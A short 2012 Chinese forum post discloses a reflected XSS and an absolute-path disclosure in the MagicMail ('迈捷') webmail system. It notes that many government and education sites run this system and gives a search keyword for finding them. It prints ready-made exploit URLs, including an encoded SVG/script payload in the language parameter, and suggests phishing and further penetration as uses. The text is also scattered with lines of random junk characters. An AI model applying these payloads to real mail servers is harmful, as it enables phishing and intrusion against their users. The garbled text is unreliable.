今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
' B4 G# q2 k3 o" A% S
& b9 T& }& ]: C; G2 [+ F6 q . @. p8 M/ L% I
包含 一个反射性XSS 以及 绝对路径泄漏
O0 F1 F' F5 [; T8 f: a9 U* }9 R看了看 貌似全部是linux的。. g( Y5 r" f [% S% h
5 x* g) o1 q- p2 R+ ]
关键字:迈捷邮件系统 by MagicMail
9 e/ h. O# }$ d) G+ U$ O6 T6 C1 T1 @& g8 L0 w
可以看到很多政府网站都用这个邮件系统
4 b6 [# l$ V6 h! \
, N$ ^' K; D9 e$ M$ g绝对路径 http://madman.in/index.php?login_type=declare&language=% p/ o( g% R' R' j" A6 V
: h' _( y0 i; A
) o: w0 h- u- q% ^( J Q6 ~( n$ s
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
8 d3 O) M& Q+ R, _7 P- `; t9 w* y% A l% P8 g0 x) Q
& W+ l, f6 ]3 _5 f8 N4 q; Q
) X n6 ~* C/ r0 K
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等6 g4 n; j4 E) T' r8 i. m3 t
; t. ~ F; ~, V修复方案:看官方补丁吧。
+ p& [ h* B% Y/ m& v9 g" } |
发表于 2012-11-9 20:38:41
收藏
支持
反对